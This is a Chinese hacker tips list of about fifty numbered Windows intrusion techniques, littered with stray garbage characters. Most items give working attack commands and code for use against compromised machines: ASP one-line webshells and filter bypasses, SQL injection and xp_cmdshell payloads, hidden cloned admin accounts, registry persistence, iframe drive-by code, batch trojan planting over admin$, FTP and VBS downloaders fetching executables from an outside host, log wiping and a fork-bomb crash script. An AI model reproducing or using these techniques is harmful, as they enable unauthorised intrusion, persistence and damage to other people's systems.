1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
9 z# v( I' I. [cacls C:\windows\system32 /G hqw20:R
! B6 }+ J2 I# K6 a; W& |" W思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入# n, |5 z% A5 D& L' i6 I- ^
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F& b& ~0 Z/ H t7 f( m# n- x
+ l& E' l4 @. u$ F- _
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。" G* N( M3 ]; \' \' F3 p6 j
+ C$ P3 i% q( V" _% }" z
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。4 |/ B% R" ]$ M4 k( u
- r' I% ?# Q& S' z* t% |0 }/ `; _* t4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
6 v. `7 C, @* K) H: z
! n8 A @' Z$ w4 U7 ~1 i5、利用INF文件来修改注册表1 A- @. Z3 l0 [# U! o. K6 Z7 J# v
[Version]
' a4 e5 v/ g) t. z4 D% l/ XSignature="$CHICAGO$"
$ z* Q7 \+ q$ o. h* i8 A0 D[Defaultinstall]
/ M' I3 c+ \" n/ b7 i' Y; Z/ Z3 RaddREG=Ating
, t2 K4 P' H; j7 ?[Ating]; a; z5 a. N. {* u6 P3 U
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"- r( N6 U: o& w5 H/ x/ u9 \
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
# Z3 m& I) `7 j+ P* ^2 z7 f; urundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
8 m- Z/ n; X/ L: ~# }; I其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU1 O4 ~/ s) H% N' i$ w
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
/ [( m" R: Z0 A- @4 F2 c' k2 eHKEY_CURRENT_CONFIG 简写为 HKCC
; ]; T- l( z/ j3 {0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
8 n! i$ b! C6 m, O2 l, A"1"这里代表是写入或删除注册表键值中的具体数据
2 t0 ]- H1 b4 @$ [9 l; }1 y
3 F D1 L* }- ?: e2 e4 j) W7 m6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,. z% X" L9 K; C2 R" ]3 s
多了一步就是在防火墙里添加个端口,然后导出其键值4 ~; Z3 |) ~/ i8 T9 p0 B* K
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
* B: d9 Q( s7 m% S* s/ U. l$ h/ K$ w
) P: |- h* S" Q# {0 G$ P7 q7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽( D8 c& X8 C. M# u: w2 s+ T* S
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
7 g7 C- U8 s2 n E' t9 B' S' }) m' K/ ]5 i
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
9 }% d" j- B4 ~( z; `# @
; L. U$ o' v5 `6 {6 p9 I9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,$ F5 e8 `! ^- F, O, X3 T, B
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
: x3 ]- Y, a! O% G7 ^1 F9 P. k$ l- _
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”) g8 ~# V" f7 I6 d$ n* p4 Y
- M! k5 a% n8 O0 D
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
% `% J3 V3 m( [* P. s' O用法:xsniff –pass –hide –log pass.txt1 Z, |( x" p/ e5 E0 v
& c6 F. Y- h4 `8 N& A
12、google搜索的艺术; o& F0 l6 S" I8 h
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”# f/ \" d- c/ k* z- Z, {* F
或“字符串的语法错误”可以找到很多sql注入漏洞。
2 F6 j8 O( _/ V$ L/ l( s
7 ?8 d- h. Y+ l# L' n8 z% H13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
) M& v4 r) q0 ^9 G! v% e. Q
( N4 y9 y. ?" ?. |14、cmd中输入 nc –vv –l –p 1987
3 }: ]4 h/ b! z( j- x# e做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
+ N' ?. A$ [5 {" a
9 m' c1 n4 v( R! C15、制作T++木马,先写个ating.hta文件,内容为
. j- D8 c' F- B5 S# u<script language="VBScript">
% s4 W8 Z% ~2 D! Q, fset wshshell=createobject ("wscript.shell" )
i0 I2 F! ~8 _/ r. c3 Ya=wshshell.run("你马的名称",1)8 R) c& d+ b6 K: z B8 ]- q- o
window.close+ g5 Z5 Y& E. E: g5 ]' Q6 q
</script>: P8 r- u3 V! o8 a8 C( p; e6 x6 f
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
7 O( o% d3 z7 u; R1 P" E/ t$ j2 Z" J/ G L
16、搜索栏里输入! X, Z1 Y N C1 b b3 M+ `4 o
关键字%'and 1=1 and '%'='' ^, c3 t+ G* }4 \7 L, P+ ~
关键字%'and 1=2 and '%'='
2 Z: E: B3 g1 G) G3 e5 f9 c4 h M, k比较不同处 可以作为注入的特征字符
7 C9 o' v- e, ~/ G- g$ v7 c4 n* b2 x( i% s5 Z
17、挂马代码<html>
* }+ J5 |+ R3 [" k b<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
; \% e) n" r- H2 F; Y ?4 p* X</html>0 H; b% Q; q z+ f
# V$ J7 H4 W6 t5 A" B18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
- c/ E5 E% I' a3 q7 T- Ynet localgroup administrators还是可以看出Guest是管理员来。
0 w/ P0 [. z/ L6 V* Y& F5 m: g3 J4 O
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等/ L1 ?+ i5 [& h4 l1 X1 n6 b
用法: 安装: instsrv.exe 服务名称 路径& |# _7 L0 L+ \ |1 |& R" U) f- }
卸载: instsrv.exe 服务名称 REMOVE& j9 Z0 w' E/ e+ d3 Y% P
$ e4 n! Q. \- K, q
- A3 p0 u$ l! N- \6 Z7 |
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
) f ~7 ^, D4 N; Q不能注入时要第一时间想到%5c暴库。) p. z; d+ G6 ~/ |: y& j4 ?0 K0 I
, j1 R; s( c( l% r4 f' y/ e
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~& q( l/ w% W/ ]; p; v+ S
9 h% Q1 l7 Y' B0 W
23、缺少xp_cmdshell时8 g: I1 Q- x' r* c2 c. p
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'9 |% h2 `! _8 T5 i
假如恢复不成功,可以尝试直接加用户(针对开3389的)/ ^7 M2 N$ T2 R+ s& e
declare @o int/ g I# U B3 K' N
exec sp_oacreate 'wscript.shell',@o out
& H8 l# `+ D+ Z) W% g2 n8 C/ O1 ^exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员7 { |, b2 b' e; Z O
# m3 {, h7 p' b$ i% E; h
24.批量种植木马.bat1 z! ~( m5 b# @) r4 ^; @# ]
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
" {7 Q- ?9 {0 I! Ifor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间8 e8 m6 Q2 W, r$ p7 l( e
扫描地址.txt里每个主机名一行 用\\开头( m, b- i( W2 ~$ u8 y
3 `7 z. ^ L" T6 K1 V6 c25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。6 ^5 D% u, f1 u* C) F, p0 T
7 }% J9 p1 }0 B, p# Q1 Y' y; S- q26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
0 T9 M; W, P9 z' R5 ~: W y将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下. H3 U) @+ s7 k! j
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
+ p' a& [( L" |
3 }% T$ P$ ?7 C4 b% v( m) C27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP% d6 T0 k! ?' z- E: K& _* P
然后用#clear logg和#clear line vty *删除日志$ U o! Z. u" F; Z* h
9 H& G& x9 j2 z7 X7 Q7 h3 O- H
28、电脑坏了省去重新安装系统的方法
$ ~$ i; ]; O/ _8 A. }纯dos下执行,
2 x- _' y9 `' f+ } e( r3 W& J# V( z1 U8 a. vxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
+ g" [2 u1 O6 V1 T0 z) l+ `2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config* g% K' e6 q( C4 X5 ]
! A6 f- Y2 |8 {7 ^8 X8 U, R29、解决TCP/IP筛选 在注册表里有三处,分别是:1 p" Y, L# K4 w3 b4 I
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
% ]# m0 m. F9 M1 E2 sHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
5 y. n9 X+ Q0 L& x% xHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& b# H) ~% l K# f4 G分别用
- j& N3 j9 g+ J0 k; eregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6 V, U# U Y7 ], W. d& v5 L) Y
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ j6 a% T8 d4 Y; ?; Eregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" V+ {; x" f+ \4 V! d( s
命令来导出注册表项
4 i1 K, z' W/ C然后把三个文件里的EnableSecurityFilters"=dword:00000001,
: H+ D2 c3 R& z/ Z. j! E+ e改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
- d% h' c8 D- o5 ?regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
9 J/ f) e8 ^, n! o/ I m3 s: @0 d. V5 N* H7 T6 h
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
. H% j" ~# v# K( U$ c) J3 \SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的34 t8 Z* G0 ^1 F s7 }% C
" A( W& u) k, w. V
31、全手工打造开3389工具
* [9 J% D' `& a$ R6 A打开记事本,编辑内容如下:; T! n. R: {- j1 t) ?
echo [Components] > c:\sql- b% R1 b- Q" a
echo TSEnable = on >> c:\sql
% N( A+ e. z: p ^1 Gsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q/ \) Z. |3 ? A" h. s7 t
编辑好后存为BAT文件,上传至肉鸡,执行
5 d/ M7 z0 A9 r8 V; d# W; S9 X: {. v* e8 ^0 W$ q. S
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
: ^8 F! Z. X# |. k9 T6 H4 Y' W' P1 f; a ` R/ Q
33、让服务器重启
: I, \3 \5 |. I h5 U+ J写个bat死循环:2 M- A. h& k% a8 Z" y! h6 D0 P
@echo off- M; g2 K- v3 e' p1 c8 d
:loop17 u) s( u( O6 e; C% K9 {. N
cls5 g0 g! m$ h4 U0 X
start cmd.exe/ T ?, ?' w. R& V0 a m7 ?
goto loop1
2 Y Z# D8 a7 s& Z' D7 N' Z7 ?保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
/ k) a" [: A5 T8 W% u. f; t& V) ]( h
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
! L" N2 D* |1 M; _: c@echo off* B& V& e4 ~; @" l) P$ e( a2 x
date /t >c:/3389.txt% K* i0 _# M& Y# a% I8 A9 c" o
time /t >>c:/3389.txt
3 h' A& S1 [6 }7 Eattrib +s +h c:/3389.bat
7 \- S+ f. u8 E9 d* t6 x+ k% Sattrib +s +h c:/3389.txt% S. B4 l; p- H' y5 o
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
% Z# S9 j% b+ x. A: j并保存为3389.bat
, X( H) T; C3 q0 L H打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号/ ]& `" G" {0 A- T5 L
* T# I) _6 m( S0 J35、有时候提不了权限的话,试试这个命令,在命令行里输入:
% o3 }1 r5 h9 ~% N2 dstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
) m3 N# m c( [, X& L- b& ]+ B- h输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。7 N4 {% {- |* l! {3 t+ `
3 M( x9 h8 W1 S- ~
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
& ~5 e; q* @9 J G! Cecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址+ }. v+ u/ b* x; N D5 r
echo 你的FTP账号 >>c:\1.bat //输入账号1 b/ c- O4 U9 z; K# q) F/ L
echo 你的FTP密码 >>c:\1.bat //输入密码# G' `+ u+ C. L- a# b
echo bin >>c:\1.bat //登入7 {& M6 P2 i- c. v! f1 H( a& j
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
* G3 N" E2 {$ K A# H0 v" t: J1 Wecho bye >>c:\1.bat //退出5 H& U$ o2 ^4 `+ h9 @6 ?% U9 r' r
然后执行ftp -s:c:\1.bat即可
/ U4 t* O( f+ G* g: f- {6 @- C* K* i( i. `( s
37、修改注册表开3389两法
# X' J5 k2 |( Y(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表; z, O9 B5 G& u- \. d3 B
echo Windows Registry Editor Version 5.00 >>3389.reg. G2 G( q# m( ^6 p/ O- k
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
- H$ H8 U' s4 o. l. }4 J. E+ P2 e7 ~echo "Enabled"="0" >>3389.reg
, Y/ V `" {5 |9 `) }6 `/ ?echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
7 s) @' B: ` B# x( H$ yNT\CurrentVersion\Winlogon] >>3389.reg4 c, Z+ S8 Z) E8 A2 O" Y, z
echo "ShutdownWithoutLogon"="0" >>3389.reg
' e3 \5 U' j* w7 B$ R! @8 Q0 u" B& Secho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]' D8 O- H# S6 {9 K
>>3389.reg/ r: E( i3 z# q1 C
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
% m! Q/ B( ?3 p& U" Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]. y( Q4 q8 E/ J$ Z3 ?- U
>>3389.reg( e: ^3 q% s! I5 B
echo "TSEnabled"=dword:00000001 >>3389.reg
2 _$ M! N T1 K/ d; i$ p* |echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg9 D# L8 k+ R. h+ J# o/ o" Z$ g
echo "Start"=dword:00000002 >>3389.reg
$ \, a* ?; y7 P6 h+ o; b$ ~7 eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
8 x1 b4 |7 Y- `2 F! O5 b>>3389.reg8 f% t9 z9 y6 [/ [" O' B% t* ^
echo "Start"=dword:00000002 >>3389.reg2 `; @7 j' @1 q* a% Z( O
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
9 H; _* O* \9 v5 ^! ]9 E& a! pecho "Hotkey"="1" >>3389.reg
9 D2 T% d- n- r: R; Mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' y% ] A* R9 ?/ jServer\Wds\rdpwd\Tds\tcp] >>3389.reg
% N# x) u% a: r) w, D; Decho "PortNumber"=dword:00000D3D >>3389.reg7 g% a( J4 s2 Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 w3 U$ w0 Q* ]Server\WinStations\RDP-Tcp] >>3389.reg
% `. S3 @# \/ x/ W* @2 T7 @echo "PortNumber"=dword:00000D3D >>3389.reg
' z6 X8 \: |+ X. j5 v把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。& q& V2 \6 ?/ S% K
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
& Y1 }8 R7 ^0 t K- j6 X) a3 b因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效, Z1 v5 H3 {, j& O$ q5 ~
(2)winxp和win2003终端开启2 W) [: V* T X( N, Z6 o
用以下ECHO代码写一个REG文件:
& B0 b3 S- v9 z2 c! ^3 A' wecho Windows Registry Editor Version 5.00>>3389.reg
% n" Z. l6 C+ fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal W( V; S8 g% G
Server]>>3389.reg# N' M& e, R; }( e& H4 X
echo "fDenyTSConnections"=dword:00000000>>3389.reg* o" [2 Z3 u2 y9 N+ u8 Q3 n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* B+ @& g. ^% b
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
P' h1 A4 ~% E- J% Kecho "PortNumber"=dword:00000d3d>>3389.reg2 I& x& R+ Y2 g" r( W1 T+ S5 Z/ k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& |" }/ k( ^- M( Y' s
Server\WinStations\RDP-Tcp]>>3389.reg
& _4 U* O0 Z& Secho "PortNumber"=dword:00000d3d>>3389.reg
: M0 e- N( B4 u然后regedit /s 3389.reg del 3389.reg
$ C, p/ T5 `: N! jXP下不论开终端还是改终端端口都不需重启$ n$ A4 Z! q* Q8 f
4 U% f) ]3 F2 \( D0 v5 t( g/ Y38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
6 E+ S8 A, Y7 @( l4 S# m用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'% d% v) S5 q; _6 [& [7 h
" j# T: L0 ~9 B6 c0 e* @) {
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
& K, K8 J3 V0 d6 S(1)数据库文件名应复杂并要有特殊字符4 r1 P. p2 Z: j: r" T
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源! b: p P; S: k& L
将conn.asp文档中的3 b8 a1 ?/ W% ?8 d/ f
DBPath = Server.MapPath("数据库.mdb")
5 b- H5 a7 a: y! O: Lconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
, Q. X, P- P" W6 b x% p1 X6 x3 [ f1 u. R
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
# Q R3 ~1 m; v) O2 [# E(3)不放在WEB目录里4 ]8 G r, w$ ?& Y; g( w$ H2 L
- f x0 S! F6 w0 k5 K q5 y
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉0 o( q/ |/ I" R% D9 @. K. n
可以写两个bat文件
, u4 P# C3 d5 S) s4 P@echo off
: \( }$ ]$ L2 n" h+ q* S( B@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe+ f5 ]1 \% J! t8 V; ^6 {
@del c:\winnt\system32\query.exe9 w% J- ^4 K: |& U$ z
@del %SYSTEMROOT%\system32\dllcache\query.exe: Q+ l I I! _% G, `
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的; ?9 y- ~9 m, n
6 _0 d$ |5 y w
@echo off
% |! H/ z, @* t2 ^7 e@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe' S6 i; |9 V# H2 d/ L
@del c:\winnt\system32\tsadmin.exe0 M& o, o0 ^: U* w& t: l
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex, }( l- u; K7 l
7 N. A- t. B/ [( y; @$ ]) `5 }41、映射对方盘符
' V4 E. }9 r. s, Xtelnet到他的机器上, }% n" d# c$ N1 }5 O5 l" q
net share 查看有没有默认共享 如果没有,那么就接着运行# v$ r% R$ Q4 `
net share c$=c:
" \, W- H$ n' ~net share现在有c$! d3 d8 l, u4 z5 F; M" U
在自己的机器上运行' `6 b; ?5 o1 d
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K1 P! | N5 b$ W* ~! |# O
- |; s& Z( \: }
42、一些很有用的老知识5 Q" j/ Y7 P0 N1 h6 @! ^. u
type c:\boot.ini ( 查看系统版本 )
: T% I( f, \' @* |2 j( Dnet start (查看已经启动的服务)3 I5 N' T, \. g+ b% M B
query user ( 查看当前终端连接 )
( @7 G7 u3 _5 r. z! {" Q. ]4 Bnet user ( 查看当前用户 )
) L# q! f) r9 l8 M* H, Nnet user 用户 密码/add ( 建立账号 )3 w8 V& }8 Q" D. H$ c- \% j, Y
net localgroup administrators 用户 /add (提升某用户为管理员)/ r3 \. w) E- Y7 {$ H8 ~
ipconfig -all ( 查看IP什么的 )
, f2 s2 ?0 g: Pnetstat -an ( 查看当前网络状态 ): A' c+ w0 ~" P4 {: T
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
) q; z8 T6 }, y# ?; D& N! [# W克隆时Administrator对应1F4$ j6 I% ^+ J2 ^! l: ^: p, A" q& X/ s' K
guest对应1F5: x" \2 R$ V/ ~
tsinternetuser对应3E8
9 Y& J0 i3 w. V8 e( d+ [- \; P5 o& W% t h
43、如果对方没开3389,但是装了Remote Administrator Service
: B9 K6 }& o& s s1 e7 ~" {1 f: d用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
% k* g$ H) O: Q1 e. ^2 p, e解释:用serv-u漏洞导入自己配制好的radmin的注册表信息5 v" n* h' s# k8 W. Q( J5 [* l* g
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin", Y! X: f6 M: q$ D7 J& E
6 w# [% a5 Q0 g! y
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
) a0 F$ I& E6 _$ P9 E, p, s本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
. O' y0 S. R, t3 F2 \) G5 Y/ d6 M: f5 l
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
: A1 F. G/ ^. ]- j( @( b; A8 P7 c- V" ^echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open3 H5 s B! _# m( `' ~1 O
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =( n& o/ A3 ?% E \( q: Y) j8 y
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
. _( I; Z) B, [( r6 [9 H% N+ i1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
) g( O( _$ P0 d3 P6 e- [(这是完整的一句话,其中没有换行符)
2 h$ O. [3 e0 x+ a然后下载:2 q5 p4 O0 F/ ^" @
cscript down.vbs http://www.hack520.org/hack.exe hack.exe2 _; G' ]/ p1 G) @! V( t( k
9 O! U7 E( U1 t3 z3 ?) t
46、一句话木马成功依赖于两个条件:1 [% d1 p8 Z' n
1、服务端没有禁止adodb.Stream或FSO组件
- G% R$ i" {/ [9 }, m. y0 l. K2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
9 J* S4 ~, z6 h7 V3 V( V8 \
; j8 G+ }! F( [! s. \. j47、利用DB_OWNER权限进行手工备份一句话木马的代码:3 ~( h2 ]- |: }- h
;alter database utsz set RECOVERY FULL--# e' B; }, d, P, b/ ]0 f
;create table cmd (a image)--0 h9 c( _6 i+ S6 s7 P. U) K
;backup log utsz to disk = 'D:\cmd' with init--) W, N7 w: c+ J0 a6 k: S
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--3 u1 ~# m0 ^' I9 J
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
! I5 Q& G0 R8 p; X( q2 I' x" s注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。; P+ v; q0 c4 ]" Z. }$ V
2 l5 z6 P1 ?) R- Y$ _+ u* B+ N. l4 m& b
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:: d$ s$ w# Z) X7 B2 J. e
) y" U7 h" [# x. v8 G
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options0 n" E% Q T' D+ ~2 m! ]! R
所有会话用 'all'。
; y3 ?; a! q8 ]-s sessionid 列出会话的信息。
/ e. T5 F" W1 t7 d/ M3 E& ^-k sessionid 终止会话。
1 A4 K3 E5 m" q4 M, G! y# \-m sessionid 发送消息到会话。
: |' p6 S0 N& e+ W% t$ F' A( v4 F: @
config 配置 telnet 服务器参数。
! f9 A# `" J9 q8 v, S F% C5 k" Y* o+ y" X
common_options 为:
+ {) |6 j3 S/ m: ^5 v-u user 指定要使用其凭据的用户4 {0 ?; d! ]5 D1 |7 r: f; s8 i
-p password 用户密码, @- }" U5 ?; d6 o
4 K* o4 F5 O1 Hconfig_options 为:. X- t9 C' O3 @8 |# h
dom = domain 设定用户的默认域+ n0 [+ R( p- Z! O) w
ctrlakeymap = yes|no 设定 ALT 键的映射: T5 _7 @2 r! a- e
timeout = hh:mm:ss 设定空闲会话超时值
" U) a7 N8 \' ftimeoutactive = yes|no 启用空闲会话。1 F; p+ j# x+ i: U' a6 U
maxfail = attempts 设定断开前失败的登录企图数。# Y5 B* U& R+ f/ A& x
maxconn = connections 设定最大连接数。
" H0 U6 l6 L# e- o1 |% vport = number 设定 telnet 端口。
+ V/ N) V1 W' vsec = [+/-]NTLM [+/-]passwd
. ]/ M0 z0 e9 N设定身份验证机构, g6 ` J' N# E5 l" e; ?$ Q$ V
fname = file 指定审计文件名。
6 I( ^+ U7 f5 `3 rfsize = size 指定审计文件的最大尺寸(MB)。4 B* H& D" e5 u2 h. T- M0 h
mode = console|stream 指定操作模式。6 [2 o D: T7 e+ \
auditlocation = eventlog|file|both
4 a/ a( Z ^' c" F% T. M指定记录地点5 Z/ P3 ]+ @( M: X5 l- @) g8 Y
audit = [+/-]user [+/-]fail [+/-]admin
) p6 G) N# [( C4 }! l3 ?8 {7 u) A$ K1 Z+ }+ B! |
49、例如:在IE上访问:, ?& x+ |& L4 p5 M, `
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/( [) a* W+ @2 a7 \; ?+ C4 C% D
hack.txt里面的代码是:
7 u" a# j' E( U<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
; Q8 ?& _9 ^. Q4 X把这个hack.txt发到你空间就可以了!# R2 W8 _9 b. a" \% J ?: D3 u
这个可以利用来做网马哦!* ^5 d) Z4 G( s
4 L% \4 `! y$ ~
50、autorun的病毒可以通过手动限制!
" e8 c/ y# X {1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!; K. f; B/ I! ]: k4 h% C e
2,打开盘符用右键打开!切忌双击盘符~
0 y; h! N. z2 _( Q+ W! v3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
- u# N* r8 n) i8 t, o% l9 f
& V& o9 k) S" K' A, w( y51、log备份时的一句话木马:; d1 B% `2 c# A
a).<%%25Execute(request("go"))%%25>! L2 R+ `+ f- S9 h1 f
b).<%Execute(request("go"))%>7 V1 G" u3 Z- n: a
c).%><%execute request("go")%><%
: l) y9 A4 T* _ ?d).<script language=VBScript runat=server>execute request("sb")</Script>( m* [, t9 X' V7 h) V9 y5 K
e).<%25Execute(request("l"))%25>6 ~/ F1 @: x/ M1 ?" r7 t
f).<%if request("cmd")<>"" then execute request("pass")%>; l: R5 E! V; |8 c8 L
' [( U& @( ?/ I7 Q0 D- B2 i52、at "12:17" /interactive cmd
1 m% U9 C* J: S k) Y0 g9 W执行后可以用AT命令查看新加的任务
